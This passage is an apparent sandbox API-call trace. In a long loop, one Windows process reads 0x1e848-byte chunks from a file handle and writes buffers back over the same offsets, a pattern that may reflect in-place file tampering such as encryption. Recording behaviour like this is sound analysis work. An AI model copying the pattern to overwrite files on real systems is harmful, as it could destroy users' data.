lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0117.364] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x46555f0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0117.364] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0117.364] GetProcessHeap () returned 0x500000 [0117.365] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0117.365] GetProcessHeap () returned 0x500000 [0117.365] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0117.365] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x4692680, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0117.365] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0117.378] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x4692680, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0117.378] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0117.379] GetProcessHeap () returned 0x500000 [0117.379] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0117.379] GetProcessHeap () returned 0x500000 [0117.379] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0117.379] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x46cf710, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0117.379] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0117.389] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x46cf710, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0117.389] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0117.390] GetProcessHeap () returned 0x500000 [0117.390] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0117.390] GetProcessHeap () returned 0x500000 [0117.390] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0117.390] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x470c7a0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0117.390] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0117.438] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x470c7a0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0117.438] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0117.439] GetProcessHeap () returned 0x500000 [0117.439] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0117.439] GetProcessHeap () returned 0x500000 [0117.439] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0117.439] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x4749830, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0117.439] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0117.461] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x4749830, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0117.461] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0117.462] GetProcessHeap () returned 0x500000 [0117.462] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0117.462] GetProcessHeap () returned 0x500000 [0117.462] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0117.462] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x47868c0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0117.462] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0117.477] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x47868c0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0117.477] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0117.478] GetProcessHeap () returned 0x500000 [0117.478] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0117.478] GetProcessHeap () returned 0x500000 [0117.478] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0117.478] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x47c3950, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0117.478] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0117.496] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x47c3950, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0117.496] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0117.497] GetProcessHeap () returned 0x500000 [0117.497] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0117.497] GetProcessHeap () returned 0x500000 [0117.497] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0117.497] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x48009e0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0117.497] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0117.512] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x48009e0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0117.512] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0117.513] GetProcessHeap () returned 0x500000 [0117.513] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0117.513] GetProcessHeap () returned 0x500000 [0117.513] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0117.513] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x483da70, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0117.513] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0117.559] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x483da70, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0117.559] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0117.559] GetProcessHeap () returned 0x500000 [0117.559] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0117.559] GetProcessHeap () returned 0x500000 [0117.559] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0117.559] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x487ab00, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0117.560] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0117.579] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x487ab00, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0117.579] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0117.580] GetProcessHeap () returned 0x500000 [0117.580] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0117.580] GetProcessHeap () returned 0x500000 [0117.580] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0117.580] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x48b7b90, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0117.580] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0117.663] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x48b7b90, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0117.663] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0117.664] GetProcessHeap () returned 0x500000 [0117.664] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0117.664] GetProcessHeap () returned 0x500000 [0117.664] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0117.664] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x48f4c20, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0117.664] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0117.751] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x48f4c20, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0117.751] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0117.753] GetProcessHeap () returned 0x500000 [0117.753] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0117.753] GetProcessHeap () returned 0x500000 [0117.753] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0117.753] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x4931cb0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0117.753] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0117.846] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x4931cb0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0117.846] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0117.846] GetProcessHeap () returned 0x500000 [0117.846] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0117.846] GetProcessHeap () returned 0x500000 [0117.846] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0117.846] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x496ed40, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0117.847] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0117.989] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x496ed40, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0117.989] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0117.992] GetProcessHeap () returned 0x500000 [0117.992] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0117.992] GetProcessHeap () returned 0x500000 [0117.992] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0117.992] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x49abdd0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0117.992] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0118.001] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x49abdd0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0118.001] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0118.001] GetProcessHeap () returned 0x500000 [0118.001] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0118.001] GetProcessHeap () returned 0x500000 [0118.001] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0118.002] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x49e8e60, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0118.002] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0118.025] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x49e8e60, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0118.025] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0118.027] GetProcessHeap () returned 0x500000 [0118.027] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0118.027] GetProcessHeap () returned 0x500000 [0118.027] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0118.027] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x4a25ef0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0118.027] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0118.036] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x4a25ef0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0118.037] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0118.038] GetProcessHeap () returned 0x500000 [0118.038] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0118.038] GetProcessHeap () returned 0x500000 [0118.038] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0118.038] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x4a62f80, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0118.038] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0118.062] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x4a62f80, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0118.063] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0118.063] GetProcessHeap () returned 0x500000 [0118.063] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0118.063] GetProcessHeap () returned 0x500000 [0118.063] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0118.063] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x4aa0010, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0118.063] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0118.110] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x4aa0010, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0118.110] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0118.111] GetProcessHeap () returned 0x500000 [0118.111] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0118.111] GetProcessHeap () returned 0x500000 [0118.111] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0118.111] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x4add0a0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0118.111] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0118.188] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x4add0a0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0118.188] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0118.189] GetProcessHeap () returned 0x500000 [0118.189] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0118.189] GetProcessHeap () returned 0x500000 [0118.189] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0118.189] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x4b1a130, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0118.189] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0118.210] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x4b1a130, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0118.210] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0118.211] GetProcessHeap () returned 0x500000 [0118.211] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0118.211] GetProcessHeap () returned 0x500000 [0118.211] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0118.211] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x4b571c0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0118.211] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0118.220] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x4b571c0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0118.220] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0118.221] GetProcessHeap () returned 0x500000 [0118.221] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0118.221] GetProcessHeap () returned 0x500000 [0118.221] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0118.221] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x4b94250, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0118.221] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0118.234] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x4b94250, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0118.235] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0118.235] GetProcessHeap () returned 0x500000 [0118.235] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0118.235] GetProcessHeap () returned 0x500000 [0118.235] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0118.235] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x4bd12e0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0118.235] ReadFile (in: hFile=0x220, 